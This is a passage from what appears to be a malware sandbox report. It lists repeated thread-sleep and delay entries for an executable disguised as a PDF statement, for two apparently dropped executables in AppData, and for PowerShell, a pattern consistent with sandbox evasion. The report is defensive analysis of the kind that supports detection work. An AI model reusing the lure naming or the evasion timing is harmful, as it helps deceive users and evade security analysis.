                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199546Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199437Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199328Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199214Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1199109Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198999Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198890Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198781Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198671Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198551Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198421Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198312Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198192Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1198062Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1197952Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1197839Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1197733Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1197624Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeThread delayed: delay time: 1197514Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1200000
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199887
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199770
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199637
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199527
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199418
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199308
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199199
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1199090
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198980
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198871
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198746
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198595
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198465
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198355
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198245
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198136
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1198027
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197918
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197808
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197691
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197558
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197415
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197257
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1197142
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1196894
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1196150
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1196023
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1195621
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1195511
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1195402
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1195292
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1195183
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1195072
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeThread delayed: delay time: 1194961
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199949
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199828
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199718
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199609
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199498
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199390
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199281
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199170
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199062
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198953
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198843
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198734
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198624
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198515
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198406
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198295
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198187
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198078
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197968
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197856
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197734
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197625
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197515
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197406
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199951
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199839
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199719
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199609
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199473
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199335
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199219
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1199105
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198956
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198828
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198719
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198411
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198281
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198172
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1198062
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197953
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197844
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197734
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197621
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197500
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197391
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197276
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197156
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1197047
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196936
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196828
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196719
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196594
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196484
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeThread delayed: delay time: 1196375
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4027Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6023Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWindow / User API: threadDelayed 4363Jump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exeWindow / User API: threadDelayed 5478Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWindow / User API: threadDelayed 4252
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exeWindow / User API: threadDelayed 5575
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow / User API: threadDelayed 5084
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow / User API: threadDelayed 4765
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow / User API: threadDelayed 6549
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeWindow / User API: threadDelayed 3282
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep count: 4027 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7384Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -99874s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -99763s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -99656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -99546s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -99437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -99316s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -99187s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -99070s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -98953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -98841s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -98734s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -98624s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -98515s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -98404s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -98296s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -98184s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -98078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -97968s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -97859s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -97749s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -97640s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -97531s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -97421s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -97312s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -97203s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -97087s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -96984s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1200000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1199874s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1199765s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1199656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1199546s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1199437s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1199328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1199214s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1199109s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1198999s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1198890s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1198781s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1198671s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1198551s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1198421s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1198312s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1198192s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1198062s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1197952s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1197839s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1197733s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1197624s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\Statement of Account PDF.bat.exe TID: 7524Thread sleep time: -1197514s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -35048813740048126s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -99875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -99766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -99657s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -99423s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -99297s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -99188s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -99077s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -98936s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -98828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -98308s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -98203s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -98094s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -97969s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -95957s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -95829s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1200000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1199887s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1199770s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1199637s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1199527s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1199418s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1199308s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1199199s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1199090s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1198980s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1198871s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1198746s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1198595s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1198465s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1198355s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1198245s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1198136s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1198027s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1197918s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1197808s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1197691s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1197558s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1197415s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1197257s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1197142s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1196894s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1196150s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1196023s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1195621s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1195511s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1195402s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1195292s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1195183s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1195072s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gDdsxauPhk.exe TID: 7884Thread sleep time: -1194961s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep count: 39 > 30
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -35971150943733603s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -100000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7236Thread sleep count: 5084 > 30
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -99875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7236Thread sleep count: 4765 > 30
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -99762s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -99641s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -99531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -99422s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -99313s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -99156s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -99046s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -98937s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -98828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -98712s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -98594s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -98484s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -98375s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -98266s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -98141s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -98016s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -97906s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -97797s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -97687s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -97578s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -97469s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -97359s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7212Thread sleep time: -97250s >= -30000s
